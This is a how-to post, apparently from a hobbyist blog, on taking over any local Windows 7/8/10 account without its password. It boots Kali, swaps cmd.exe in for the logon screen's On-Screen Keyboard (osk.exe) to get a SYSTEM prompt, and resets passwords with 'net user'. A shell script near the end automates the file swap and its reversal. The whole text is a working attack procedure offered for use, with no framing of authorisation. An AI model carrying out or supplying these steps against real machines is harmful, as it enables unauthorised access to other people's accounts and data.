Hack Any Windows 7/8/10 User Password Without Logging In
Warning: This resets the password; it does NOT tell you what the old password was. Anything Windows protects with a key derived from the user's password (EFS-encrypted files, DPAPI-protected secrets such as saved credentials) becomes inaccessible, because a reset made from outside the account, unlike a normal password change, cannot re-encrypt those keys under the new password.
This trick abuses the Ease of Access tools on the logon screen. Selecting 'On-Screen Keyboard' there makes Windows launch osk.exe, and because the logon screen runs before anyone has logged in, that process runs with SYSTEM privileges. If osk.exe has been swapped for cmd.exe beforehand (rename the real osk.exe to something else, then give cmd.exe the on-screen keyboard's old name), the logon screen hands you a SYSTEM command prompt instead of a keyboard. It will all make sense later.
Step 1: Launch Any OS That Allows Full Access to the Windows Folders
In this case I am going to be using Kali, although you can use many different Linux distros or even a Windows install disk/USB; as long as you can get to a terminal or command prompt and can write to the Windows partition, you're good. Two things can stop this step: the Linux side needs a read-write NTFS driver (ntfs-3g on Kali), and a Windows volume protected with BitLocker cannot be modified offline without the recovery key.
Step 2: Navigate to System32
I'm going to assume you know basic navigation and can find the Windows partition. In my case I'm currently writing this on my laptop rather than my desktop, so my Windows volume is labelled BOOTCAMP, as I am on a MacBook with Windows dual booted.
Once you reach that partition, cd into Windows, then into System32.
Step 3: Rename osk.exe to osk.exe.old
osk.exe is the Ease of Access 'On-Screen Keyboard' executable. Rename it using whatever your system's rename command is; in Kali the command would be: mv osk.exe osk.exe.old
Step 4: Rename cmd.exe to osk.exe
I'm sure you see how this works by now, but I'll explain it anyway. When you press 'On-Screen Keyboard' in the Ease of Access menu, Windows launches osk.exe, which is normally the on-screen keyboard application. We have changed things so that name now points at cmd instead. Like magic. Command: <system rename command> cmd.exe osk.exe. Kali: mv cmd.exe osk.exe
(Copying instead of moving, cp cmd.exe osk.exe, leaves the real cmd.exe in place for everything else on the system that expects it.)
Step 5: Launch Windows and Select 'On-Screen Keyboard' in the Ease of Access Menu
I found this picture on the web, but what you normally see should be something like it: the logon screen with the Ease of Access menu open. After going through all the steps above, you should instead see a command prompt.
Sorry for the poor picture; I couldn't find a way to take a screenshot on the logon screen.
Step 6: Resetting the Password
Now you can type in the magical command to change the password. The command: net user <USERNAME> <PASSWORD>, with the username in quotes if it contains spaces. Example: net user "Admin" temppass
If you are not sure of the exact account name, net user with no arguments lists the local accounts. This only works for local accounts; domain accounts are stored on the domain controller, not in the local SAM.
Step 7: Finished! You Can Log In Now!
Voilà, you can now log in with whatever password you typed in. If you want to put things back, simply go back to Kali and undo what you did: rename osk.exe to cmd.exe and rename osk.exe.old to osk.exe.
Well, that's it for my first post! I came across this trick a while ago and found that it still works, so I don't know how common it is or anything like that. Hopefully it's not too popular and to many this article is something new! Well, enjoy!
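The offline part of the procedure (steps 3, 4 and 7) as a small POSIX shell script, added here as an example; it is not part of the original post. It assumes the Windows volume is already mounted read-write (ntfs-3g on Kali) and takes the path of its Windows/System32 directory as an argument; the /mnt/win mount point in the usage comment is an assumption. It differs from the post in two ways: it copies cmd.exe into place instead of moving it, so cmd.exe stays where Windows expects it, and it refuses to run the swap twice so the osk.exe.old backup is never overwritten.

```shell
#!/bin/sh
# Offline swap of osk.exe for cmd.exe on a mounted Windows volume, plus the
# reverse operation. Added example, not the original post's commands.
# Assumption: $1 is the Windows/System32 directory of a volume that is
# already mounted read-write.

# Sanity-check the target directory before touching anything.
check_sys32() {
    dir="$1"
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 1; }
    [ -f "$dir/cmd.exe" ] || { echo "cmd.exe missing in $dir" >&2; return 1; }
    return 0
}

# Steps 3 and 4: back up the real osk.exe, then put a copy of cmd.exe in
# its place. A copy (not a move) keeps cmd.exe itself usable.
swap_osk() {
    dir="$1"
    check_sys32 "$dir" || return 1
    if [ -e "$dir/osk.exe.old" ]; then
        echo "osk.exe.old already exists; refusing to overwrite the backup" >&2
        return 1
    fi
    [ -f "$dir/osk.exe" ] || { echo "osk.exe missing in $dir" >&2; return 1; }
    mv "$dir/osk.exe" "$dir/osk.exe.old" || return 1
    cp "$dir/cmd.exe" "$dir/osk.exe" || return 1
    echo "osk.exe now launches cmd.exe; original saved as osk.exe.old"
}

# Step 7: put the real On-Screen Keyboard back from the backup.
restore_osk() {
    dir="$1"
    check_sys32 "$dir" || return 1
    if [ ! -f "$dir/osk.exe.old" ]; then
        echo "no osk.exe.old backup in $dir; nothing to restore" >&2
        return 1
    fi
    rm -f "$dir/osk.exe" || return 1
    mv "$dir/osk.exe.old" "$dir/osk.exe" || return 1
    echo "osk.exe restored"
}

# Usage from Kali, with the Windows volume mounted at /mnt/win (assumed path):
#   swap_osk /mnt/win/Windows/System32
#   ... reboot into Windows, open Ease of Access > On-Screen Keyboard,
#       run: net user "<USERNAME>" <PASSWORD> ...
#   restore_osk /mnt/win/Windows/System32
```

Run the swap, reboot into Windows and reset the password with net user from the prompt that appears, then boot back to Kali and run the restore so the logon screen's On-Screen Keyboard is a keyboard again.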